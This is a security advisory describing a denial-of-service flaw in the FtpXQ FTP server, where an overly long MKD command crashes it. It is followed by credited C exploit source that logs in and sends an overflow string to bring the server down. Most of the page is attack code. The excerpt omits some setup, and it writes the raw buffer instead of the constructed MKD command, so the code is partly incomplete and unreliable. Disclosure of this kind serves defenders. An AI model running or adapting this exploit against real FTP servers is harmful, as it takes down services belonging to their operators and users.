FtpXQ is "an enterprise level FTP server with numerous features, making it ideal for both beginner and advanced users alike. Setting up a server with FtpXQ is simple: just install, add or import your users, and you are ready to run".A vulnerability in FTPXQ allows remote attackers sending an overly long MKD command to cause it to crash.
Credit:
The information has been provided by Federico Fazzi.
Exploit:
/*
* 0xf_ftpxq.c - FTPXQ Denial of service exploit.
* Federico Fazzi <federico@autistici.org>
*
* advisory by Eric Sesterhenn.
* -- Server built using the WinsockQ from DataWizard Technologies. A
security
* -- vulnerability in the product allows remote attackers to overflow an
* -- internal buffer by providing an overly long "make directory" request.
*
* r20061025.
*/
len = sizeof(struct sockaddr);
// init connection
if(connect(sd, (struct sockaddr *)&saddr, len) == -1) {
perror("connect()");
exit(1);
}
printf("FTPXQ Server - Denial of service exploit.\n"
"Federico Fazzi <federico@autistici.org>\n"
"---------------------------------------\n");
puts("connecting..\t\t done");
// sending a USER data to daemon
sprintf(buf, "USER %s\r\n", argv[3]);
write(sd, buf, strlen(buf));
puts("sending USER data..\t done");
// sending a PASS data to daemon
sprintf(buf, "PASS %s\r\n", argv[4]);
write(sd, buf, strlen(buf));
puts("sending PASS data..\t done");
// sending a BOF string with MKD command to host
sprintf(buf, "MKD %s", bof);
write(sd, bof, strlen(bof));
puts("sending MKD bof string.. done");
// now checking if server i down
if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0)
puts("[!] server doesn't vulnerable");
else
puts("[+] server getting down.. done");
close(sd);
